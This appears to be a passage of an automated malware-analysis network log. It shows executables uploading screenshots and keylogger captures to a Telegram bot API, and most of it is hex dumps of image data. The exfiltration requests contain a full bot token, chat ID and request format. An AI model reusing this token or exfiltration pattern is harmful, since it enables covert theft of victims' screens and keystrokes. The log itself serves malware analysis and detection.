2024-12-03 13:27:53 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:27:53 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:27:53 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:27:53 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:27:53 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:27:53 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:27:53 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:27:53 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:27:57 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:27:57 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49761	149.154.167.220	443	7744	C:\Users\user\AppData\Roaming\LjlEiSlJe.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:27:54 UTC	559	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-SC:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 3932422 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:27:54 UTC	16355	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 53 63 72 65 65 6e 73 68 6f 74 69 55 6d 63 4f 66 4f 6b 2e 42 4d 50 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 42 4d 36 00 3c 00 00 00 00 00 36 00 00 00 28 00 00 00 00 05 00 00 00 04 00 00 01 00 18 00 00 00 00 00 00 00 3c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 24 1a 00 24 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 23 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="ScreenshotiUmcOfOk.BMP"Content-Type: application/octet-streamBM6<6(<$$######$$$$
2024-12-03 13:27:54 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:27:54 UTC	16355	OUT	Data Raw: 22 16 00 22 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 19 01 24 24 03 2d 46 0c 35 68 15 3b 81 1b 3e 8c 1e 19 aa b2 09 a5 d9 10 84 a9 17 51 59 1f 23 13 21 18 03 21 16 00 21 16 00 21 16 00 21 16 00 21 16 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 Data Ascii: ""!!!!!!!!!!!!!!!!$$-F5h;>QY#!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:27:54 UTC	16355	OUT	Data Raw: 00 1e 11 00 1e 11 00 1e 11 00 1e 11 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f Data Ascii:
2024-12-03 13:27:54 UTC	16355	OUT	Data Raw: 0b 01 ff ff ff 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0b 00 1b 0b 01 1b 0b 01 1b 0b 01 1b 0b 00 1b 0b 00 1b 0a 01 1b 0a 00 1b 0b 01 1b 0b 01 1b 0a 01 76 6c 67 1b 0a 01 1b 0b 01 1b 0b 01 1b 0b 01 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: vlg$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:27:54 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:27:54 UTC	16355	OUT	Data Raw: 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 15 00 21 14 00 21 14 00 21 15 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 00 21 14 Data Ascii: !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
2024-12-03 13:27:54 UTC	16355	OUT	Data Raw: 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 10 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1e 0f 00 1d 0f 00 1d 0f 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d 0e 00 1d Data Ascii:
2024-12-03 13:27:54 UTC	232	OUT	Data Raw: 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 24 1a 00 c2 c2 c2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii: $$$$$$$$$$$$$$$$$$$$$$$$$$$$
2024-12-03 13:27:54 UTC	16355	OUT	Data Raw: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 Data Ascii:
2024-12-03 13:27:58 UTC	388	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 03 Dec 2024 13:27:58 GMT Content-Type: application/json Content-Length: 552 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49773	149.154.167.220	443	7388	C:\Users\user\Desktop\yMvZXcwN2OdoP6x.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-03 13:27:59 UTC	556	OUT	POST /bot7725030292:AAFHYtQUWDdOhIko2DIqyexjh4XvUaOA1Fs/sendDocument?chat_id=6732456666&caption=DC-KL:::user-PC\user\8.46.123.228 HTTP/1.1 Accept: / Content-Type: multipart/form-data; boundary=3fbd04f5-b1ed-4060-99b9-fca7ff59c113 Accept-Language: en-ch Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: api.telegram.org Content-Length: 5155 Connection: Keep-Alive Cache-Control: no-cache
2024-12-03 13:27:59 UTC	5155	OUT	Data Raw: 2d 2d 33 66 62 64 30 34 66 35 2d 62 31 65 64 2d 34 30 36 30 2d 39 39 62 39 2d 66 63 61 37 66 66 35 39 63 31 31 33 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 6f 63 75 6d 65 6e 74 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 4b 65 79 44 61 74 61 4c 73 63 78 76 59 71 4b 2e 74 78 74 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6f 63 74 65 74 2d 73 74 72 65 61 6d 0d 0a 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 31 35 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 31 35 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 67 65 72 3e 3e 0d 0a 0d 0a 5b 30 38 3a 32 37 3a 31 35 5d 3c 3c 50 72 6f 67 72 61 6d 20 4d 61 6e 61 Data Ascii: --3fbd04f5-b1ed-4060-99b9-fca7ff59c113Content-Disposition: form-data; name="document"; filename="KeyDataLscxvYqK.txt"Content-Type: application/octet-stream[08:27:15]<<Program Manager>>[08:27:15]<<Program Manager>>[08:27:15]<<Program Mana
